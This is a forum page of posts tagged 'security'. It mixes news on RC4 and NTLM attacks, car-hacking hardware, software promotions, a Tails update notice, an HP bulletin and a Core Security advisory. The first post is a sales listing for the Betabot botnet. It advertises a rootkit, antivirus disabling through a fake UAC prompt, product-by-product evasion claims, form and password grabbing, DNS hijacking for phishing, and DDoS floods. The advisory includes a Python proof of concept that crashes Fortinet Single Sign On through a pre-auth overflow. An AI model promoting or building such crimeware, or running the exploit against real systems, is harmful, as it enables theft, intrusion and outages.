Showing results for tags 'security'.

  1. Multitasking HTTP bot with working DDoS attacks and more.
     Description:
     ==============================
     List of main Betabot functions:
     ==============================
     * User-mode rootkit (Ring3 rootkit). Supports x64 / x86 systems. The rootkit component hooks the low-level x86 system call functions (KiFastSystemCall and x86SwitchTo64BitMode) to intercept all system calls made by a process, without leaving visible traces of your activity. Removed hooks are automatically restored by the bot.
     * ANTI-AV module. Using a social engineering method (written in 12 languages) that appears as a legitimate-looking UAC window, the bot can raise its rights to administrator level. After obtaining administrator rights, Betabot is able to disable more than 30 antivirus tools! The success rate of this method is about 70%! This function can be enabled/disabled through the botnet control panel! List of supported antivirus tools: AhnLab V3 Lite (XP only), ArcaVir, Avast!, AVG, Avira, BitDefender (on minimal config), BKAV, BullGuard, Emsisoft Anti-Malware, ESET NOD32 / Smart Security, F-PROT IS, F-Secure, GData IS, Ikarus AV, K7 AntiVirus, Kaspersky AV / IS (older versions only), Lavasoft Adaware AV, Malwarebytes Anti-Malware, McAfee, Microsoft Security Essentials, Norman AntiVirus, Norton AntiVirus (Vista+ only), Outpost Firewall Pro, Panda AV / IS, Panda Cloud AV (free version), PC Tools AntiVirus, Rising AV / IS, Sophos Endpoint Antivirus, Total Defense, Trend Micro, Vipre, Webroot SecureAnywhere AV, Windows Defender, ZoneAlarm IS.
     * ANTI-MALWARE module. This module lets Betabot scan the system (heuristically) for the presence of malware and destroy it (including new, unknown trojans / viruses). A useful module for those who also want to "clean" their loads of the competition!
     * Bot security module. The Betabot process / bot file / Windows registry data are under constant protection against removal / destruction, using a variety of methods (not only the rootkit). If the registry keys and the bot file are deleted, they are restored automatically. This module improves the survival rate of your loads!
     * Process injection. Betabot uses several self-written injection techniques to evade many antivirus products (at runtime). List of bypasses: ArcaVir IS - bypass; Avast - bypass; Avast Internet Security - injected, but causes a sandbox window; AVG Internet Security - bypass; Avira - bypass; Avira Internet Security - bypass; BitDefender - bypass (depending on settings); BullGuard - attempts to kill after a reboot; Comodo - popup window; Dr. Web - bypass; ESET AV / ESET Smart Security - bypass; F-Secure - bypass; GData - popup window; K7 AntiVirus - bypass; Kaspersky Anti-Virus - bypass (depending on settings); Kaspersky Internet Security - bypass (depending on settings); McAfee Total Protection - bypass; Norman IS - popup window; Norton Internet Security - bypass; Panda Internet Security 2013 - bypass; PandaCloud - bypass; PC Tools AntiVirus - bypass; Rising IS - bypass; Total Defense - bypass; Trend Micro - bypass; VIPRE - bypass; ZoneAlarm - bypass.
     * DNS editor module. Uses interception of the functions responsible for DNS activity on the victim. Can be used to redirect DNS lookups on your loads (for example, for Facebook phishing, redirect facebook.com to a fake page: facebook.com 127.0.0.1).
     * File search. Searches for files on the system, with flexible settings and a variety of search filters. All files are packed into a ZIP archive and uploaded to the server.
     * Form grabber module. Steals forms from the following browsers: Mozilla Firefox (latest version), Google Chrome (supports SSL), Internet Explorer. All form grabber logs are conveniently sorted in the control panel.
     * FTP / POP3 / SSH grabber module. Allows stealing passwords and sending them to the control panel. Everything happens in real time! (PuTTY, FileZilla, etc.)
     * Proactive protection module (this function is optional and can be enabled / disabled through the control panel). Active protection mode: in this mode Betabot blocks any attempt to install malicious software on the system, and also automatically detects malware that is already installed and removes it from the system! Sometimes you need to turn this function off via the control panel (for example, if you want to download a RAT onto the load; otherwise Betabot destroys it automatically).
     ==============================
     Additional BETABOT features:
     ==============================
     * Build size 150KB
     * Config editor
     * Bootkit lock (does not allow bootkits of the Carberp / Rovnix / Gapz family, etc. to install)
     * Support for 16 servers
     --------------------------
     * 4 different DDoS attack methods (UDP flood, HTTP flood, CONNECT-DISCONNECT flood, SLOWLORIS FLOOD (KILL APACHE))
     - Slowloris flood DDoS lets you take down an Apache web server with a minimal number of bots.
     - The Connect-Disconnect flood DDoS attack is a variant of SYN flood based on the TCP protocol. Unlike a SYN flood, where we do not answer the server's ACK packet, the CONNECT-DISCONNECT flood completes the TCP handshake (the connection) fully and repeats it many times. Lacking the resources to process the large number of connections, the server becomes unable to work. We decided not to implement a SYN flood because a full flood of this type is not available on Windows systems (without modifying the Tcpip driver); using third-party drivers is therefore not the best prospect.
     - HTTP flood DDoS attack, fully randomized and optimized.
     - Standard UDP flood DDoS attack.
     --------------------------
     * USB autorun (LNK with file)
     * SOCKS 4 server (turns the loads into SOCKS proxies)
     * Download / Update / Execute: standard loader features (supports loading DLL files into the memory of a zombie svchost.exe process, as well as JAR files)
     Detailed and good-looking panel. Panel images:
     Home: http://i.imgur.com/hdXeq1P.png
     DNS editor: http://i.imgur.com/K1tt7MC.png
     Form grabber filters: http://i.imgur.com/Y7cShSd.png
     Realtime grabber PuTTY / FTP / POP3: http://i.imgur.com/G03jQ8B.png
     Targets: http://i.imgur.com/eDKBei0.png
     SOCKS proxy configuration: http://i.imgur.com/ritA4WR.png
     Control panel requirements. In order to host the control panel on your server you need the following software:
     • ionCube Loader 5.3+
     • PHP 5.3.x
     • MySQL
     • PHPMyAdmin
  2. AVG Internet Security 2015 provides you with protection against viruses, malware, spam, scams, phishing, and more. Plus, it has additional features such as a firewall, internet accelerator, privacy protector, and more. Read more at SharewareOnSale: Free AVG Internet Security 2015 (100% discount).
  3. Try them; possibly not all of them work.
  4. The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols. Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic.
     Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream. It required attackers to view more than 17 billion (2^34) separate encryptions of the same data. That was a high bar, particularly given that the attack revealed only limited amounts of plaintext. Still, since the researchers demonstrated the attack could decrypt HTTPS-protected authentication cookies used to access user e-mail accounts, Google and other website operators immediately took notice.
     Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (2^26) encryptions, a two-order-of-magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail.
     Bar-mitzvah attack
     A second exploit targeting RC4 was devised by researchers from security firm Imperva and was presented Thursday at the Black Hat security conference in Singapore. The attack uses new ways to exploit the "invariance weakness," a key pattern in RC4 keys that can leak plaintext data into the ciphertext under certain conditions. The weakness first came to light in 2001, and led to the fatal exploit against wired equivalent privacy technology used to encrypt Wi-Fi networks. Given the age of the invariance weakness, Imperva researchers are dubbing their new exploit the "bar-mitzvah attack."
     "The security of RC4 has been questionable for many years, in particular its initialization mechanisms," Imperva researchers wrote in a research paper that accompanied Thursday's Blackhat talk. "However, only in recent years has this understanding begun translating into a call to retire RC4. In this research, we follow [the 2013 RC4 researchers] and show that the impact of the many known vulnerabilities on systems using RC4 is clearly underestimated."
     The bar-mitzvah attack requires adversaries to sample about one billion RC4 encryptions to infer a credit card number, password, or authentication cookie key. The known weakness exploited involves a flaw found in one out of every 16 million (2^24) RC4 keys that leads to "structures" in the "least significant bits" of the keystream. The attack is subject to a significant limitation, however, since the leaky plaintext is contained only in the first 100 bytes of ciphertext. Despite the limitation and the challenge of sampling so many encryptions, the attack may be enough to drastically reduce the cost of doing an exhaustive attack that guesses passwords, credit card numbers or similar data. Rather than try every possible combination, the bar-mitzvah attack allows attackers to home in on a much smaller number of candidates.
     The growing body of attacks that defeat SSL and TLS encryption is only one threat facing the system millions of Internet users rely on to encrypt sensitive data and authenticate servers. In 2011 hackers broke into Netherlands-based certificate authority DigiNotar and minted counterfeit credentials for Google and other sensitive Web properties. Earlier this week, shoddy practices at an intermediate CA known as MCS Holdings allowed its customers to obtain unauthorized certificates for several Google addresses. Poor practices on the part of Microsoft also led to the discovery of misissued certificates, on two separate occasions.
     "RC4 must die"
     The TLS protocol has two significant phases. The first "handshaking" phase uses asymmetric encryption to negotiate the symmetric encryption keys to be used by an e-mail or Web server and the connecting end user. During the later "record" phase, the parties use the agreed-upon keys to encrypt data using either the AES block cipher or RC4 stream cipher. The two attacks unveiled this month, combined with the exploit disclosed in 2013, are a strong indication the security of RC4 can't be counted on for much longer and should be phased out in favor of alternative algorithms.
     Retiring RC4 is proving a challenging proposition. A 2011 attack known as BEAST—short for Browser Exploit Against SSL/TLS—targets an encryption mode known as CBC, or cipher block chaining, which is present in most algorithms except for RC4. After BEAST was demonstrated to pose a credible threat to TLS-protected data in transit, many security experts recommended website operators opt for RC4 to blunt the threat. That advice is no longer sound, now that RC4 is under attack, too. Imperva researchers say Web app developers should strongly consider disabling RC4 in all their TLS configurations and tech-savvy end users should disable RC4 in their browser settings. In February, the Internet Engineering Task Force submitted a request for comments prohibiting the use of the RC4 cipher. Use of RC4 has shrunk from about half of all TLS traffic in 2013 to about 30 percent today, but eliminating it altogether may take years.
     Hanging in the balance is the security and confidentiality of millions of Internet users. "RC4 was already looking nervously towards the cliff-edge," Kenny Paterson, a Royal Holloway, University of London professor who helped author last week's research, as well as the 2013 research it built on, wrote in a blog post published last week. "Our work pushes RC4 a significant step closer, leaving it teetering on the brink of oblivion for SSL/TLS. After all, attacks can only get better…"
     Source
  5. A default setting in both Windows 7 and 8.1 could allow local users to elevate privileges and, in some situations, escape application sandboxes. The issue, something that leaves all current Windows client installations vulnerable, lies in the way the operating system handles authentication. In some instances it could be possible for a user to use a reflection attack in NT LAN Manager, a collection of security protocols found in Windows systems, to leverage WebDAV (Web Distributed Authoring and Versioning) and carry out an attack.
     “It’s possible to abuse cross-protocol NTLM reflection to attack the local SMB server by forcing a local system process to access a WebDAV UNC path,” warned James Forshaw, the Google Project Zero security researcher who found the issue, on Monday.
     Forshaw discovered the issue last year and reported it to Microsoft’s Security Response Center on Dec. 18, but the time that Project Zero gives to vendors to fix bugs – 90 days – elapsed last week, so the Google Security Research post and its proof of concept were opened to the public. According to Microsoft, however, the issue doesn’t merit a fix, as the company has implemented mitigations for it, like Extended Protection for Authentication, in the past. According to Forshaw’s disclosure timeline, the company informed him in January that undoing the mitigations could cause “application compatibility concerns.”
     When reached Wednesday, a Microsoft spokesperson confirmed that users should implement EPA to avoid reflection attacks using NTLM as a vector. “Extended Protection for Authentication (EPA) is a security feature built-in to Windows 8 and 8.1, and available for older versions of Windows via knowledge base article 2345886, that helps protect our customers against this technique. We encourage customers to follow the guidance outlined in the article to enable EPA, which is off by default as it may cause some application compatibility concerns.”
     As EPA doesn’t come enabled by default, however, Forshaw is stressing that users looking to avoid reflection attacks follow a different set of precautions, including enabling SMB signing or enabling SMB Server SPN verification. Forshaw points out that users can also disable their WebClient service, something that would make it trickier to elevate to local system, but that this wouldn’t prevent attacks like sandbox escapes, which require only user-level permissions. It also might be possible to stage the exploit in another fashion, including via a DCE/RPC call.
     As Forshaw acknowledges in his write-up, this is far from a new issue for Microsoft – the company actually addressed a similar issue way back in 2008 (MS08-068) that could have let attackers use NTLM to mirror authentication from one machine back to the same machine. The patch disallowed NTLM sessions in flight but failed to address cross-protocol attacks like the one Project Zero found.
     Source
  6. Product Description: Advanced SystemCare 8 PRO. Ultimate Performance Booster. Boosts the speed of startup, Internet connection and the whole PC. Protects you against spyware and adware in real time. Optimizes, cleans, and fixes a variety of PC problems with just 1 click. Protects your privacy by cleaning surfing traces automatically. Advanced SystemCare 8 PRO provides automated and all-in-one PC care service with Malware Removal, Registry Fix, Privacy Protection, Performance Tune-up, and System Cleaning capabilities. It also creates a superior and safer online experience with the latest Browser Anti-Tracking and Internet Boost technology, to ensure your top online security and maximum PC performance.
     Features:
     • Basic System Clean, Fix and Optimization
     • Ultimate System Tuneup for Top Performance
     • Up to 300% Internet Speedup with Internet Booster
     • Real-time Optimization with Active Optimize
     • Deep Windows Registry Clean
     • Maximum Hard Drive Performance
     • Basic Protection from Security Threats
     • Full Detection against Security Threats
     • Safe Online Experience with Surfing Protection
     • Auto Clean for Privacy Security Whenever You Log on
     • Auto Update to the Latest Version
     • Runs in the Background – Install and Forget It
     • Fantastic New Skins & Themes
     • Free 24/7 Technical Support on demand
  7. THE AVERAGE AUTOMOBILE today isn’t necessarily secured against hackers, so much as obscured from them: Digitally controlling a car’s electronics remains an arcane, specialized skill among security researchers. But that’s changing fast. And soon, it could take as little as $60 and a laptop to begin messing around with a car’s digital innards. Tomorrow at the Black Hat Asia security conference in Singapore, 24-year-old Eric Evenchick plans to present a new device he calls the CANtact. The open source board, which he hopes to sell for between $60 and $100, connects on one end to a computer’s USB port, and on the other to a car or truck’s OBD2 port, a network port under its dashboard. That makes the CANtact a cheap interface between any PC and a vehicle’s controller area network or CAN bus, the collection of connected computers inside of every modern automobile that control everything from its windows to its brakes. With just that go-between gadget and the open source software that Evenchick is releasing for free, he hopes to make car hacking a far cheaper and more automated process for amateurs. “I realized that there were no good tools for me to play around with this stuff outside of what the auto industry uses, and those are incredibly expensive,” Evenchick says, referring to products sold by companies like Vector that can cost tens of thousands of dollars. “I wanted to build a tool I can get out there, along with software to show that this stuff isn’t terribly complicated.” Over the last several years, researchers have shown that car hacking represents a real security threat. In 2013, for instance, Darpa-funded security researchers Chris Valasek and Charlie Miller showed (with me as their chosen crash-test dummy) that it was possible to send digital commands from a laptop connected to a car’s CAN bus that affected steering, slammed on brakes, or even disabled brakes at some speeds. 
Evenchick’s gadget aims to make exactly that sort of testing more accessible to researchers. In their tests, Valasek and Miller used a $150 ECOM cable that they rewired by hand to connect to their test vehicles’ OBD2 ports. (Valasek says a stock cable capable of that connection would have cost $1,200.) Evenchick’s CANtact is designed to make that connection out of the box at a much lower cost. The average coder isn’t familiar with the protocol most cars’ computers rely on to communicate. But Evenchick has written open source software for CANtact that automates much of the manual work of CAN bus hacking. Like the earlier work by Valasek and Miller, the CANtact is designed to send commands in Unified Diagnostics Services, the CAN protocol that auto mechanics use to communicate with electronic control units (or ECUs) throughout a vehicle. That allows anyone to write python scripts that can automatically trigger commands in a car’s digital network that range from turning off its “check engine” light to automatically pumping its brakes. “Most people have no idea there’s all this diagnostic stuff that someone who’s connected to the CAN bus can use to do all these interesting things,” says Evenchick. “What are the extent of those features? And what implementation problems exist that could be big security holes?” For now, actually figuring out what a certain UDS command sent from the CANtact might do in a specific vehicle will largely be a matter of trial and error for amateur car hackers, says Evenchick. But by publishing its software on Github, he hopes the code will become a collection of different hackers’ techniques that target individual vehicle makes and models. “It would be awesome if people messing around with their cars… could work together to build a library [of code] to do all this stuff,” says Evenchick. “You’re a Honda owner, and someone else is a Honda owner. 
If they find some cool things to do and you want to play around with it too, they can share it.” The CANtact, of course, can only test security exploits that require physical access, not remote attacks. But the device does help to automate the testing of security exploits that would be possible once a hacker has already gained a wireless foothold on a car’s network. And the notion of a hacker gaining that sort of initial wireless foothold in a car’s network is more than theoretical. Researchers at the University of Washington and the University of California at San Diego demonstrated in 2011 that they could gain access to an unnamed car’s network through wireless attacks that included a Bluetooth connection, the car’s OnStar-like cellular radio, and even Android malware on the driver’s phone. Evenchick says his CANtact gadget isn’t intended to make any sort of malicious car hacking easier. Instead, he argues, it’s meant to foster hobbyist car hacking and security research that can expose and help fix real vulnerabilities in the digital components of cars and trucks. Miller and Valasek’s earlier research, for example, served as a public demonstration that cars’ internal networks lack basic security protections. Their work led to Senator Edward Markey sending a series of questions to 20 automakers that eventually revealed widespread inattention to security and in some cases a potential lack of anti-hacking measures in their cars and trucks. Only seven of the companies said they used third party security auditing for their vehicles, and only two said they currently had features to respond to a hacker intrusion on their vehicles’ CAN buses. The more attention and testing those car systems receive, Evenchick says, the more secure they’ll eventually become. “You don’t really own a device until you can open it up and tear it apart,” says Evenchick. “Your car is more connected than ever before. 
Just having people know what’s going on with cars and understand them better would be kind of nice.” Source
  8. UK-based Darktrace, a cyber security startup that leverages machine learning and mathematics to detect threats, announced this week that it has raised $18 million in funding. Founded in 2013 by senior members of the UK's GCHQ and other intelligence agencies, Darktrace is headquartered in Cambridge, UK, with offices in London, Milan, New York, Paris, San Francisco, Singapore and Washington D.C. The funding came from investors including Invoke Capital, Talis Capital, Hoxton Ventures and private individuals, with the latest funding round valuing the company at $80 million.
     The company said that its “Enterprise Immune System” technology detects previously unknown threats using machine learning and mathematics developed at the University of Cambridge. In more detail, the company explains on its website that the Darktrace platform “models patterns of life for each user and machine” to detect normal and abnormal behaviors as they emerge, without already knowing what it is looking for, and calculates the probability of a threat based on the detection of behavioral anomalies.
     In addition to the funding, the company announced that it has opened an Asia Pacific office in Singapore. Sanjay Aurora, who has more than 25 years' experience leading enterprise software firms, will oversee the expansion process in the Asia Pacific region, Darktrace said. Aurora is joined by John Muser, formerly of IBM Security, heading up Australia and New Zealand, and Stanley Hsu, formerly of McAfee.
     "Darktrace is growing at a phenomenal rate. It has been barely a year since we deployed to our first customer and now we have deployments at 75 companies and relationships with 50 partners across America, UK, continental Europe and the Middle East," said Darktrace CEO Nicole Eagan. "Our headcount has tripled over the past year and expansion into Asia is a natural next step."
     British telecommunications services giant BT announced this month that it was integrating Darktrace's platform, which will be added to BT's security portfolio and be available both as part of an integrated cyber security offering and as a point solution within BT's Assure portfolio of managed security services. BT also said that it would integrate Darktrace into its own enterprise security defenses to protect internal assets.
     Source: securityweek.com
  9. Several security holes that affect Tails 1.3 are now fixed in Tails 1.3.1. We strongly encourage you to upgrade to Tails 1.3.1 as soon as possible.
     Details:
     • Tor Browser: Mozilla Foundation Security Advisory 2015-28, Mozilla Foundation Security Advisory 2015-29
     • Linux: CVE-2015-1465, CVE-2015-1420 and CVE-2015-1593
     • OpenSSL: Debian Security Advisory 3197
     • file and libmagic: Debian Security Advisory 3196
     • libxfont: Debian Security Advisory 3194
     • tcpdump: Debian Security Advisory 3193
     • libgnutls26: Debian Security Advisory 3191
     • libav: Debian Security Advisory 3189
     • FreeType 2: Debian Security Advisory 3188
     • ICU: Debian Security Advisory 3187
     • NSS: Debian Security Advisory 3186
     • libgcrypt11: Debian Security Advisory 3185
     • GnuPG: Debian Security Advisory 3184
     • libssh2: Debian Security Advisory 3182
     • libarchive and bsdtar: Debian Security Advisory 3180
     • libgtk2-perl: Debian Security Advisory 3173
     • CUPS: Debian Security Advisory 3172
     https://tails.boum.org/security/Numerous_security_holes_in_1.3/index.en.html
  10. Zer0 is a user-friendly file deletion tool with a high level of security. With Zer0, you'll be able to delete files and to prevent file recovery by a third person. So far, no user has reported an efficient method to recover a file deleted by Zer0.
     Features:
     • User-friendly HMI: drag'n'drop, 1 click and the job is done!
     • High security file deletion algorithm
     • Multithreaded application core: maximum efficiency without freezing the application
     • Internationalization support
     DOWNLOAD LINK: KC Softwares
  11. Ever feel your eyes glazing over when you see yet another security warning pop up on your monitor? In a first, scientists have used magnetic resonance imaging to measure a human brain's dramatic drop in attention that results when a computer user is subjected to just two security warnings in a short time.

In a paper scheduled to be presented next month at the Association for Computing Machinery's CHI 2015 conference, researchers will present data that maps regions of the brain responsible for visual processing. The MRI images show a "precipitous drop" in visual processing after even one repeated exposure to a standard security warning and a "large overall drop" after 13 of them. Previously, such warning fatigue has been observed only indirectly, such as one study finding that only 14 percent of participants recognized content changes to confirmation dialog boxes or another that recorded users clicking through one-half of all SSL warnings in less than two seconds.

Building a better mousetrap

The inattention is the result of a phenomenon known as habituation, or the tendency for organisms' neural systems to show partial or complete cessations of responses to stimuli over repeated exposures. Such repetition suppression, or RS, has long been documented in everything from sea slugs to humans. By directly measuring RS in the brains of people exposed to computer security warnings, the scientists were then able to test more effective ways that software makers can alert people to potential risks. The paper—titled "How Polymorphic Warnings Reduce Habituation in the Brain—Insights from an fMRI Study"—is one of two to be presented at CHI 2015 that studies people's responses to security warnings. A second paper is titled "Improving SSL Warnings: Comprehension and Adherence."

Besides leading to potential improvements in user interfaces, the research may pave the way for better security education, training, and awareness (SETA) programs, password use, and information security policy compliance. The scientists wrote:

The experiment was conducted on 25 participants recruited from a university who were native English speakers. The subjects lay on their backs on an MRI table and had a volume coil placed over their heads to allow imaging of the entire brain. The participants then viewed experimental images on a large monitor at the opening of the scanner. In all, each participant viewed a unique set of 560 images.

A second experiment tracked participants' responses to security warnings in a more natural setting while using a laptop computer. To measure attention paid to a particular warning, the researchers analyzed users' mouse cursor movements along the x, y, and z axes using a timestamp of each movement at a millisecond rate.

The habituation response caused by humans' frequent exposure to warnings has been documented as long ago as 2006. Since then, numerous studies have supported what many people know intuitively: the more times a website, computer, or smartphone displays a warning, the harder it is to heed its urgent message. The fatigue sets off a vicious cycle in which many end users increasingly make poorly informed security choices and designers add more warnings to counteract the increased threats.

The research team—made up of six scientists from Brigham Young University, the University of Pittsburgh, and Google—went on to test so-called polymorphic warnings. As their name suggests, polymorphic warnings change their colors, text, shapes, and other characteristics rather than presenting the same static content each time. The MRI data showed reduced habituation to repeated warnings that changed. A second measurement using mouse tracking also showed reduced habituation from repeated warnings, and it also showed slower habituation.

The findings could be seminal for makers of software and hardware alike as they search for new ways to steer users clear of everything from weak password choices to websites pushing malware. "Polymorphic warnings garner more attention over time due to the novelty of their changing appearance," the researchers wrote. "Changing appearance of the warning reinvigorates attention, especially in brain regions that have been shown to demonstrate RS to exact repetitions of visual stimuli. For this reason, polymorphic warnings that continually change their appearance will slow the rate of habituation."

Source
  12. 1. Advisory Information

Title: Fortinet Single Sign On Stack Overflow
Advisory ID: CORE-2015-0006
Advisory URL: http://www.coresecurity.com/advisories/fortinet-single-sign-on-stack-overflow
Date published: 2015-03-18
Date of last update: 2015-03-18
Vendors contacted: Fortinet
Release mode: Coordinated release

2. Vulnerability Information

Class: Stack-based Buffer Overflow [CWE-121]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2281

3. Vulnerability Description

Through Fortinet [1] "Single Sign On" or "Single User Sign On" users logged on to a computer network are authenticated for access to network resources through the FortiGate unit without having to enter their username and password again. Fortinet Single Sign On (FSSO) provides Single Sign On capability for Microsoft Windows networks using either Active Directory or NTLM authentication and Novell networks, using eDirectory.

FSSO [4] monitors user logons and sends the FortiGate unit the username, IP address, and the list of Windows AD user groups to which the user belongs. When the user tries to access network resources, the FortiGate unit selects the appropriate security policy for the destination. If the user belongs to one of the permitted user groups, the connection is allowed.

There is a vulnerability in the message dispatcher used by FSSO Windows Active Directory and FSSO Novell eDirectory. Exploitation of this vulnerability might lead to a full network compromise.

4. Vulnerable packages

- FSSO Windows Active Directory 4.3.0161 (4.3.0151, 4.3.0129 were also tested and found vulnerable)
- FSSO Novell eDirectory 4.3.0161

Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Core Security recommends those affected use third party software such as Sentinel [3] or EMET [2] that could help to prevent the exploitation of affected systems to some extent.

Fortinet published the following FortiGuard Bulletin: [5]

6. Credits

This vulnerability was discovered and researched by Enrique Nissim in collaboration with Andres Lopez Luksenberg, both from the Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.

7. Technical Description / Proof of Concept Code

[CVE-2015-2281] The vulnerability in both cases can be exploited by sending a special packet to the services without being authenticated (pre-auth). Given that both software systems require an Administrative account in order to run (Windows Domain Admin or eDirectory Admin accordingly), the full network is exposed. Pre-authenticated Remote Code Execution with Domain Administrative rights is possible.

The vulnerability is located in the Message Dispatcher for message PROCESS_HELLO. Here is a PoC (Proof of Concept) that causes the application thread with the FortiGate appliance to crash:

    import socket
    import struct

    TARGET_IP = "192.168.233.100"

    def play():
        message = "\x80\x01\x42\x42"
        buff = "A" * 248
        buff += "B" * (0xfffff - len(buff))
        payload = struct.pack(">I", 0x000fffff) + message + buff
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_IP, 8000))
        s.send(payload)
        buff_recv = s.recv(6000)
        print buff_recv
        s.close()

    play()

8. Report Timeline

2015-01-07: Core Security notifies Fortinet of the vulnerabilities. Publication date is set for February 2nd, 2015.
2015-01-09: Fortinet requests a copy of the advisory draft.
2015-01-09: Core Security sends a draft copy of the advisory to the vendor.
2015-01-14: Fortinet informs they are in the process of validating the report and asks if we want to commit to responsible disclosure.
2015-01-14: Core Security informs the vendor that our policy is to publish our findings in order to help the users to gain awareness of the issues and therefore allowing them to take the necessary precautions to protect themselves. We informed them that we always try to release our findings in a coordinated manner provided that the time the vendor takes to test and fix the issue is reasonable and the publication of this solution and our disclosure is agreed between the two parties.
2015-01-21: Core Security asks the vendor if they were able to review the vulnerabilities and a tentative date for publishing the fix and consequently the advisory.
2015-01-27: Fortinet acknowledges the vulnerabilities and informs that a fix of the source code is in order. They say they'll keep us updated regarding the release schedule.
2015-02-24: Fortinet informed us that the current ETA was the first week of March, but that it could be changed depending on their engineering load.
2015-02-24: Core Security requested a specific date considering that the first week of March was next week.
2015-02-27: Fortinet informed us that they currently don't have a fixed date. Additionally they sent us the link where their FortiGuard Bulletin is going to be published. They requested the CVE ID we are going to assign this issue.
2015-03-05: Core Security informs Fortinet that we still don't have a CVE ID to share with them because we haven't received one from Mitre yet.
2015-03-05: Fortinet informed us that they were discussing when they were going to release the fix/update, and that they will provide us an ETA tomorrow.
2015-03-06: Fortinet informed us that their new ETA is March 11th, 2015. They clarify this is not a fixed date.
2015-03-11: Fortinet informed us that they postponed to the end of the week or next week the ETA of FortiOS 5.2.3.
2015-03-13: Core Security asks Fortinet about the status of the ETA for the fix/update. Additionally we recommended not to release it on a Friday in order to give the affected users the required time to apply the fix.
2015-03-16: Core Security asks Fortinet if they could send us their estimated ETA for the fix/update.
2015-03-16: Fortinet informed us that the current ETA is March 17th or March 18th.
2015-03-18: Advisory CORE-2015-0006 published.

9. References

[1] http://www.fortinet.com/
[2] http://support.microsoft.com/kb/2458544
[3] https://github.com/CoreSecurity/sentinel
[4] http://docs-legacy.fortinet.com/cb/html/index.html#page/FOS_Cookbook/Authentication/FSSO-IBP.html
[5] http://www.fortiguard.com/advisory/FG-IR-15-006/

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Source
  13. HP Security Bulletin HPSBST03298 1 - Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes.

Code:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04600552

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04600552
Version: 1

HPSBST03298 rev.1 - HP XP Service Processor Software for Windows, Multiple Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2015-03-13
Last Updated: 2015-03-13

Potential Security Impact: Multiple vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes.

References: SSRT101826

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

The following HP XP Service Processor Software for Windows is affected:
HP XP7
HP XP10000
HP XP12000
HP XP20000
HP XP24000
HP XP P9500

BACKGROUND
For a PGP signed version of this security bulletin please write to: security-alert@hp.com

Microsoft has published Security Information Bulletins since January 2009. This bulletin presents all of the necessary patches and updates for HP XP Service Processor Software in a cumulative format. This information is updated monthly. Updating the HP XP Service Processor Software can be performed without interference or disruption to data flow on the XP product.

RESOLUTION
HP has made a web-based spreadsheet available which lists all updates to the HP XP Service Processor Software that runs on the Microsoft Windows Operating System. The OS versions include Windows 7, Windows Vista (64 and 32 bit) and Windows XP. The document may be downloaded from here: HP Insight Management - Overview

In this HP Enterprise Information Library, select 'Storage' at the top. In the 'Products and Solutions' column, select 'XP Storage'. In the 'Information Type' column, select only 'Service and Maintenance'. The HP XP Service Processor (SVP) OS Security Patch Summary Sheet may be downloaded to your desktop.

HISTORY
Version:1 (rev.1) - 13 March 2015 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: HP: Subscribe today

Security Bulletin Archive: A list of recently released Security Bulletins is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
